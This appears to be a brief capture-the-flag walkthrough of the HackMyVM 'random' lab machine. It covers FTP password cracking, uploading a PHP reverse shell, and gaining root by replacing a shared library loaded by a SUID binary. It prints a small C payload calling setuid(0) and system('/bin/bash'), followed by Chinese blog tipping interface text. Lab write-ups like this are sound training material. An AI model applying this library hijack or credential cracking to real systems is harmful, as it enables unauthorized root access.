hackmyvm-random walkthrough

1. get reverse shell

PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

browse port 80, get the user name eleanor and alan.
user
crack ftp service, get the user eleanor's password.
ftp
use sftp login as eleanor , get into the path /html and upload reverse php shell, visit and get shell.
getshell

2. privilege escalation

find the program with suid, we get the file /home/alan/random.
suid
random used Dynamic link library /lib/librooter.so which we can replace.
libso
Disassemble random with ida.

int __cdecl main(int argc, const char **argv, const char **envp)
{
  time_t v3; // rdi
  int v5; // [rsp+1Ch] [rbp-4h]

  v5 = atoi(argv[1]);
  v3 = time(0LL);
  srand(v3);
  if ( v5 == rand() % 9 + 1 )
    makemeroot(v3);
  else
    puts("Wrong number");
  return 0;

Regardless of random numbers, you can enter the dynamic link function makemeroot as long as you try a few more times. We recompile the librooter.so with this code:

#include <stdlib.h>

void makemeroot()
{
	setuid(0);
	setgid(0);
	system("/bin/bash");
}

recompile
try a few more times, then get root.
root

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值